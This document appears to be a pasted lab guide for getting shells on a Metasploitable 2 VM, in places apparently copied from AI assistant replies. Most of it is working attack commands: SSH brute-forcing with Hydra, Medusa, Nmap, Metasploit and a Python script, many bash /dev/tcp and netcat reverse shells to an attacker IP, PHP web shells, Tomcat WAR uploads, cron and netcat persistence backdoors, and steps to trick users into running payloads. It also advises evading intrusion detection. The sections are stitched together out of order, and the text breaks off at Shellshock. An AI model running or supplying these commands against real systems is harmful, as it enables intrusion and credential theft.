Explore

explotation of linux and windows

Here’s a detailed command-oriented lab plan focusing exclusively on shell exploitation via two methods:

User Involvement (e.g., phishing, weak credentials).

No User Involvement (exploiting services and backdoors).

Lab Objective:

Gain shells on the Metasploitable 2 system through interactive and non-interactive methods.

⁠

1. Environment Setup

Ensure both Kali Linux (attacker) and Metasploitable 2 (target) are on the same network. Use their IP addresses for exploitation.

ping [Metasploitable 2 IP]

⁠

2. Gaining Shell Access via User Interaction

Step 1: Exploiting FTP with Weak Credentials

Manual Connection:

ftp [Metasploitable 2 IP]

# Login using default credentials (e.g., msfadmin:msfadmin)

Download Payload via FTP:

ftp [Metasploitable 2 IP]

put reverse_shell.sh

Execute Payload:

bash reverse_shell.sh

Brute-forcing SSH passwords using a wordlist can be done with tools such as Hydra, Medusa, or Nmap scripts. Here’s how you can accomplish this, assuming you have permission for such activities as part of a penetration testing scenario.

⁠

1. Using Hydra

Hydra is a powerful tool for brute-forcing various protocols, including SSH.

Command:

hydra -l <username> -P <path_to_password_list> ssh://<target_ip>

Example:

hydra -l msfadmin -P /usr/share/wordlists/rockyou.txt ssh://192.168.25.133

Parameters:

-l: Specifies the username to test.

-P: Specifies the path to the password list.

ssh://<target_ip>: Specifies the SSH protocol and target IP.

Brute-Force Both Username and Password:

If you want to brute force both the username and password:

hydra -L <path_to_username_list> -P <path_to_password_list> ssh://<target_ip>

Example:

hydra -L usernames.txt -P passwords.txt ssh://192.168.25.133

⁠

2. Using Medusa

Medusa is another fast brute-forcing tool.

Command:

medusa -h <target_ip> -U <path_to_username_list> -P <path_to_password_list> -M ssh

Example:

medusa -h 192.168.25.133 -U usernames.txt -P passwords.txt -M ssh

Parameters:

-h: Target IP or hostname.

-U: Path to the username list.

-P: Path to the password list.

-M ssh: Specifies the SSH module.

⁠

3. Using Nmap Scripting Engine (NSE)

Nmap's scripting engine includes a script for brute-forcing SSH credentials.

Command:

nmap --script ssh-brute --script-args userdb=<path_to_username_list>,passdb=<path_to_password_list> -p 22 <target_ip>

Example:

nmap --script ssh-brute --script-args userdb=usernames.txt,passdb=passwords.txt -p 22 192.168.25.133

Parameters:

userdb: Path to the username list.

passdb: Path to the password list.

-p 22: Specifies the SSH port (default is 22).

⁠

4. Using a Custom Python Script

If you prefer scripting your brute-force attack, you can use Python with the paramiko library.

Example Script:

import paramiko

def ssh_brute_force(target_ip, username, password_list):

for password in password_list:

try:

print(f"Trying {username}:{password}")

ssh = paramiko.SSHClient()

ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

ssh.connect(target_ip, username=username, password=password, timeout=5)

print(f"Success: {username}:{password}")

ssh.close()

return

except paramiko.AuthenticationException:

continue

except Exception as e:

print(f"Error: {e}")

break

target_ip = "192.168.25.133"

username = "msfadmin"

password_list = open("passwords.txt").read().splitlines()

ssh_brute_force(target_ip, username, password_list)

Run:

python3 ssh_brute_force.py

⁠

5. Using Metasploit

Metasploit Framework has a built-in module for SSH brute-forcing.

Steps:

Start Metasploit:

msfconsole

Load the SSH login module:

use auxiliary/scanner/ssh/ssh_login

Set the required options:

set RHOSTS 192.168.25.133

set USER_FILE usernames.txt

set PASS_FILE passwords.txt

set THREADS 5

Run the attack:

run

⁠

6. Using John the Ripper

If you have an SSH private key file that is password-protected, you can brute-force its passphrase.

Command:

john --wordlist=<path_to_wordlist> <ssh_private_key_file>

Example:

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa

⁠

Additional Notes

Ethical Use: Ensure you have explicit permission to perform brute-forcing on the target system.

Adjust Speed: Use threads responsibly (-t in Hydra, -T in Medusa) to avoid locking out the target or overloading the system.

Avoid Detection: Use stealth techniques to minimize detection by intrusion detection/prevention systems (IDS/IPS).

Legality: Unauthorized brute-forcing is illegal and unethical.

Let me know if you need further clarification or assistance!

Generate Reverse Shell Script:

echo "bash -i >& /dev/tcp/[Your IP]/4444 0>&1" > reverse_shell.sh

nc 192.168.25.77 4444 -e sh

⁠

Step 2: SSH Login with Weak Credentials

Manual Connection:

ssh msfadmin@[Metasploitable 2 IP]

ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedKeyTypes=+ssh-rsa msfadmin@192.168.25.133

Upload and Execute Shell Payload via SSH:

scp reverse_shell.sh msfadmin@[Metasploitable 2 IP]:/tmp

ssh msfadmin@[Metasploitable 2 IP] 'bash /tmp/reverse_shell.sh'

⁠

Step 3: Exploit Telnet Service

Manual Connection:

telnet [Metasploitable 2 IP]

# Login with weak credentials (e.g., msfadmin:msfadmin)

Upload and Execute Payload:

echo "bash -i >& /dev/tcp/[Your IP]/5555 0>&1" > /tmp/telnet_reverse.sh

bash /tmp/telnet_reverse.sh

⁠

3. Gaining Shell Access Without User Involvement

Step 1: Exploit vsftpd Backdoor (Port 21)

Metasploit Exploit:

msfconsole

use exploit/unix/ftp/vsftpd_234_backdoor

set RHOST [Metasploitable 2 IP]

run

Confirm Shell:

whoami

hostname

⁠

Step 2: Exploit Samba Usermap Script

Metasploit Exploit:

msfconsole

use exploit/multi/samba/usermap_script

set RHOST [Metasploitable 2 IP]

set PAYLOAD cmd/unix/reverse

set LHOST [Your IP]

set LPORT 4444

run

⁠

Step 3: Tomcat Manager Backdoor

Upload WAR File for Reverse Shell:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=[Your IP] LPORT=4444 -f war -o shell.war

curl -u tomcat:tomcat -T shell.war http://[Metasploitable 2 IP]:8080/manager/text/deploy?path=/shell

Trigger Shell:

curl http://[Metasploitable 2 IP]:8080/shell

⁠

Step 4: Remote Code Execution via MySQL

Login to MySQL:

mysql -u root -p -h [Metasploitable 2 IP]

Run System Commands via MySQL:

SELECT system('bash -i >& /dev/tcp/[Your IP]/4444 0>&1');

⁠

Step 5: Using Netcat Listener for Backdoor

Create Persistent Backdoor:

On Metasploitable 2:

echo "nc -lvp 5555 -e /bin/bash" > /tmp/backdoor.sh

chmod +x /tmp/backdoor.sh

nohup bash /tmp/backdoor.sh &

Connect to Backdoor:

On your machine:

nc [Metasploitable 2 IP] 5555

⁠

Step 6: Exploit PostgreSQL Command Execution

Connect to PostgreSQL:

psql -h [Metasploitable 2 IP] -U postgres

Run Reverse Shell Command:

CREATE OR REPLACE FUNCTION runcmd() RETURNS void AS $$

DECLARE

result TEXT;

BEGIN

result := system('bash -i >& /dev/tcp/[Your IP]/5555 0>&1');

END;

$$ LANGUAGE plpgsql;

SELECT runcmd();

⁠

Step 7: Multi-Handler Shell Listener

Setup Multi-Handler:

msfconsole

use exploit/multi/handler

set PAYLOAD linux/x86/meterpreter/reverse_tcp

set LHOST [Your IP]

set LPORT 5555

run

⁠

These methods focus on gaining shells interactively (via weak credentials) and non-interactively (via exploits and backdoors). Would you like further customization for specific services or payloads?

Here’s an extended list with additional methods for shell exploitation using both user involvement and no user involvement techniques on Metasploitable 2. The aim is to include diverse services, exploits, and creative ways to gain a shell.

⁠

1. User Involvement Exploitation

Exploiting Weak Web Credentials

Upload Reverse Shell via PHPMyAdmin

Execute the following SQL command to write a PHP reverse shell:

CREATE TABLE cmd_shell (cmd BLOB);

INSERT INTO cmd_shell VALUES ('<?php system($_GET["cmd"]); ?>');

Access the shell:

curl "http://[Metasploitable 2 IP]/uploads/shell.php?cmd=bash -i >& /dev/tcp/[Your IP]/4444 0>&1"

⁠

Social Engineering via Malicious Script

Crafting a Bash Reverse Shell Script

Create a script and host it using Python’s HTTP server:

echo "bash -i >& /dev/tcp/[Your IP]/4444 0>&1" > shell.sh

python3 -m http.server 8000

Convince the user to download and execute the script:

wget http://[Your IP]:8000/shell.sh

bash shell.sh

⁠

Netcat Listener Combined with User Input

Upload Backdoor via Simple User Commands

Trick the user to run:

echo "nc -e /bin/bash [Your IP] 5555" > /tmp/user_backdoor.sh

bash /tmp/user_backdoor.sh

⁠

2. Exploitation Without User Involvement

Exploit WebDAV Misconfiguration

Enable WebDAV File Uploads

Check for WebDAV service:

davtest -url http://[Metasploitable 2 IP]/webdav/

Upload a reverse shell:

cadaver http://[Metasploitable 2 IP]/webdav/

put shell.php

Trigger the shell:

curl http://[Metasploitable 2 IP]/webdav/shell.php

⁠

Backdoor via Cron Jobs

Inject Reverse Shell Command

Add a malicious cron job:

echo "* * * * * bash -i >& /dev/tcp/[Your IP]/4444 0>&1" > /tmp/crontab.txt

crontab /tmp/crontab.txt

⁠

Exploitation of Apache Mod_CGI

Shellshock Vulnerability

Want to print your doc?
This is not the way.

Try clicking the ⋯ next to your doc name or using a keyboard shortcut (

CtrlP

) instead.